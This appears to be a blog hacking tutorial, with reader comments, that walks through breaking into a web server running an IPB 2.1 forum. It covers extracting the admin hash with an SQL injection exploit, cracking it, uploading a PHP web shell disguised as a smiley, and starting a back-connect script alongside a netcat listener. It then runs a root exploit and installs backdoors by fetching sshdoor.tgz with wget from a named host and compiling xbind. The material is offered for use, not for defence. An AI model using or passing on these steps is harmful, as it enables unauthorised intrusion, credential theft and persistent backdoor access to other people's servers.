Exploiting and Rooting a Webserver from | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

Exploiting and Rooting a Webserver from



Exploiting and Rooting a Webserver from

Scratch Complete Tutorial


Intro:

Hey guys this is The 7th Sage and for todays tutorial we shall learn how to

exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.

1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access


Hacking a Forum Admin using Exploit to Gain

Admin Access - Part 1

As said earlier i'm going to exploit ipb v2.1 forum here. You can hack

other forums too using exploits or making own exploits (which is rare :P)


Tools Needed:

This has the shell and backdoor files along with MD5 HashCracking tool and

some other things.




Download:




Gaining Admin Access.

For today i will be hacking an ipb 2.1 forum by gaining admin access and

then I will show you how to root the server.

First i will be using a perl exploit and gain admin access to the forum. Usually the admin id

is 1 maybe 0 or 2 sometimes.

Here it is this guy:


UserName: Kawool
UserId = 2


Next we extract the user hash and salt. Switch to cmd and execute the perl

exploit.

[Image: 13230167.jpg]

Then you should see this sql injection tool.

Change the forum index path, userid (of the admin), the table name.


[Image: 59925653.jpg]

After you click get data from database you should see this hash:



[Image: 2iql3ex.jpg]

Then use converage pass salt option.


[Image: 2yuk7cg.jpg]


After you get the hash the next step to do is crack the salted hash. Since

it is ipb , cracking the hash will be a pain for sure.



Cracking the Hash:

I have provided passwords pro in the download above. It is a very efficient

tool to crack md5 hashes, even salted ones.

[Image: vwu8ud.jpg]

Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.

I got mine after sometime.

[Image: 317a8tf.jpg]

So now

Code:
Username: Kawool

Password: *******

I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.





Uploading The Shell as Admin - Part 2

Uploading a Shell:


Now that we have the admin access in our hand now is the part when we

upload a shell (For those who don't know what a shell is, It is a php script that gives

privilages to upload files on a website, mess with other files etc. And yeah allows to gain

root access too).

Uploading shell as smiley here.

In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.

[Image: x3vfuw.jpg]


Now lets browse our shell shall we..

[Image: vzdnb5.jpg]

w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did

this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.

Once its done we upload c99 shell.

[Image: 2d1x0uh.jpg]

Good shell was uploaded properly.

[Image: m5vza.jpg]

That does it for our 2nd part. Move on to Third.

Using the Shell to Gain Root Access - Part 3


Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.

So i upload back.pl i provided in the file.

[Image: rlgoqo.jpg]

After thats done time to use the script.

For this we give the following code.

Code:
perl back.pl youripaddress

[Image: 2qvyx4n.jpg]




BEFORE we execute the script we need to start netcat and start listening to conenctions on

port 2121.

use netcat from my downloadfile, and use the command:

Code:
nc -vv -l -p 2121

You should see something like this

[Image: 6s6us6.jpg]



Next we shall upload an exploit that will let us obtain root status on the server :)

[Image: 214wq3m.jpg]

Time to execute it.

[Image: 15x8g1j.jpg]

Now we upload a backdoor for future access.

Type in the following command

Code:
wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)

[Image: 9i9xdk.jpg]


Now the following command.

Code:
tar -zxvf sshdoor.tgz

Then we make sshdoor the current directory using this code..

Code:
cd sshdoor

Then

Code:
cat README

after you see the window with sang and prabu name. Execute the command

Code:
.install yourpassword 2121

After thats done, we connect to the server via putty.

[Image: ibayw9.jpg]


Err an Epic Fail has occured my friends.

[Image: 142hv09.jpg]

Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win :D (actually hackers do O_O).


Now we upload xbind.c this should be over quickly. Remember the steps don't you?:D

Indeed its easy.

[Image: 17detv.jpg]


Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script).

Code:
gcc -o xbind xbind.c


Compile, run and connect.

Paste the following code now

Code:
./xbind 1985

Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.

Now enter teh password and get going.

Code:
uname -a

[Image: 29wv9yb.jpg]

There you go, we now have future access to the server :)




That does it for our Rooting Server tutorial which will be "tltr" for some people. Gaining root access is a pain but its worth the reward. So now that you read this tut, please comment :D

Hope to bring more tuts in near future ^^;

______________________________________________________________


Credits:

Main Credits go To Neutralise who had a similar vid and provided the backdoor files. I took some tips and some screenies from him.

Last but not the least HF members who pm me to write more tuts ^^;




Share your views...

5 Respones to "Exploiting and Rooting a Webserver from"

Anonymous said...

Hey man I dn't understand much better am into hacking but still a learner..
what is your yahoo id or msn so i can add u and we can chat..


August 28, 2010 at 12:46 PM
Anonymous said...

Very nice tutorial. I can see you know what you are doing but your english is a bit rusty. Keep up the good work!


September 17, 2010 at 6:49 AM
Anonymous said...

I cannot seem to find the SQL Injection tool used in the beginning of the tutorial. Is it included? If not where can I find a copy of the script?
Thanks in advance


September 17, 2010 at 1:13 PM
Anonymous said...

hi veryr nice work but not found this sql injection tool. can i get it plz


October 21, 2010 at 11:19 AM
CardingPower said...

here is the link check it out :)

http://sql-injection-tools.blogspot.com/2010/10/invision-power-board-sql-injection.html

Post a Comment

 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com